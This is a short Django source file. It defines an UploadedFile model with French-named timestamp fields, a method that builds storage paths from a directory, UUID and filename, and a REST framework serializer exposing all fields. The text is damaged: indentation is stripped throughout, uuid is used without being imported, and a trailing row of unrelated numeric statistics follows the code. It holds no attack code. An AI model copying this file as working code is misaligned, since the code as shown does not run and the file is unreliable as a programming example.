from rest_framework import serializers
from django.db import models
# Create your models here.
class UploadedFile(models.Model):
id = models.AutoField(primary_key=True)
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
filename = models.CharField(max_length=255, null=True)
dirpath = models.CharField(max_length=255, null=True)
size = models.CharField(max_length=255, null=True)
content_type = models.CharField(max_length=255, null=True)
cree_le = models.DateTimeField(auto_now_add=True)
mis_a_jour_le = models.DateTimeField(auto_now=True)
def filepath(self, convention_uuid):
if self.dirpath:
filepath = f"{self.dirpath}/{self.uuid}_{self.filename}"
else:
filepath = (
f"conventions/{convention_uuid}/media/" + f"{self.uuid}_{self.filename}"
)
return filepath
def __str__(self):
return self.filename
class UploadedFileSerializer(serializers.ModelSerializer):
class Meta:
model = UploadedFile
fields = "__all__"
| 31 | 88 | 0.687558 | 130 | 1,085 | 5.538462 | 0.461538 | 0.083333 | 0.1 | 0.133333 | 0.272222 | 0.194444 | 0.194444 | 0 | 0 | 0 | 0 | 0.015187 | 0.21106 | 1,085 | 34 | 89 | 31.911765 | 0.825935 | 0.02212 | 0 | 0 | 0 | 0 | 0.10576 | 0.09915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.115385 | 0.038462 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |